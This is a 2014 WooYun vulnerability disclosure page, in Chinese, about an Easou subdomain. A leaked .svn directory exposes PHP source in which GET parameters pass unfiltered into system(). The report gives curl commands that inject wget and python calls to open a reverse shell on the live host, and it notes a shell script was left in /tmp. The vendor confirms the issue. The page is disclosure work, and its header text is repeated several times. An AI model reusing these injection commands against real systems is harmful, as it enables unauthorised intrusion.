宜搜某分站配置不当已被getshell | wooyun-2014-087818| WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞标题：宜搜某分站配置不当已被getshell

提交时间：2014-12-19 14:51

修复时间：2015-02-02 14:52

公开时间：2015-02-02 14:52

漏洞类型：成功的入侵事件

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-12-19：细节已通知厂商并且等待厂商处理中
2014-12-19：厂商已经确认，细节仅向厂商公开
2014-12-29：细节向核心白帽子及相关领域专家公开
2015-01-08：细节向普通白帽子公开
2015-01-18：细节向实习白帽子公开
2015-02-02：细节向公众公开

简要描述：

某神器扫描到。。。

详细说明：

某神器扫描到 svn地址泄露
http://wall.easou.com/.svn/entries
直接下载源码，基于yii框架，文件
/protected/controllers/ProController.php

//开发者后台sdk下载（可以改包名）
    public function actionGetPackageName2()
    {
        $packageName='';
        $SDKType='';
        //   $url_base='http://winads.cn:80';
        if(isset($_GET['packageName']))$packageName=$_GET['packageName'];
        if(isset($_GET['SDKType']))$SDKType=$_GET['SDKType'];
        //报名前缀
        $filename_list=array(1=>'banner-',2=>'adwall-',3=>'offers-',4=>'alert-',5=>'push-');
        $filename=$filename_list[$SDKType].time();
        $aid=1;//代理号
        //  $command_str="/var/lib/jdk1.6.0_22/bin/java -jar /home/ledian/autosdk.jar {$packageName} {$SDKType} {$aid} {$filename}";
        // $aa = exec("/usr/bin/id");
        // $bb = system($command_str);
        // var_dump($aa);
        // var_dump($bb);
        // system("/home/ledian/autopack.sh {$packageName} {$SDKType} {$aid} {$filename}");
        system("/var/www/xyz/site/autopack.sh {$packageName} {$SDKType} {$aid} {$filename}");
        $url='http://sdkdown.winads.cn/sdkoutPack/'.$filename.'.zip';
//sdkoutPack
        echo '{"state":"OK","url":"'.$url.'"}';
        exit;
    }

额 system函数未过滤，导致命令注入，直接反弹shell
curl "http://wall.easou.com/index.php?r=pro/getpackagename2&packageName=| wget -O xxx |"
curl "http://wall.easou.com/index.php?r=pro/getpackagename2&packageName=| python /tmp/test.py xxx xxx |"
见漏洞证明吧

漏洞证明：

额，直接反弹shell，反弹shell程序在/tmp/test.py 请自行删除
在机器 /etc/nginx/sites-enabled ls结果如下：麻烦自行检测确认

修复方案：

修复命令执行，修复svn泄露

版权声明：转载请注明来源米兰的小铁匠@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2014-12-19 14:59

厂商回复：

谢谢指出，我们会及时改正

漏洞评价：

2014-12-19 14:56 | azuer ( 普通白帽子 | Rank:127 漏洞数:30 )

！求神器！
2014-12-19 15:20 | ddy ( 实习白帽子 | Rank:44 漏洞数:16 | 其实第一次要我挖洞我是拒绝的。因为，你不...)

！求神器！
2015-01-10 16:28 | _Thorns ( 普通白帽子 | Rank:882 漏洞数:157 | 收wb 1：5 无限量收 [平台担保]))

！求神器！
2015-01-11 13:01 | 淡蓝色の忧伤 ( 普通白帽子 | Rank:172 漏洞数:26 | 开启审计php代码模式 (⊙v⊙)嗯)

！求神器！

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-087818

漏洞标题：宜搜某分站配置不当已被getshell

相关厂商：easou.com

漏洞作者：米兰的小铁匠

提交时间：2014-12-19 14:51

修复时间：2015-02-02 14:52

公开时间：2015-02-02 14:52

漏洞类型：成功的入侵事件

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源米兰的小铁匠@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-087818

漏洞标题：宜搜某分站配置不当已被getshell

相关厂商：easou.com

漏洞作者： 米兰的小铁匠

提交时间：2014-12-19 14:51

修复时间：2015-02-02 14:52

公开时间：2015-02-02 14:52

漏洞类型：成功的入侵事件

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-087818"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 米兰的小铁匠@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：米兰的小铁匠

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源米兰的小铁匠@乌云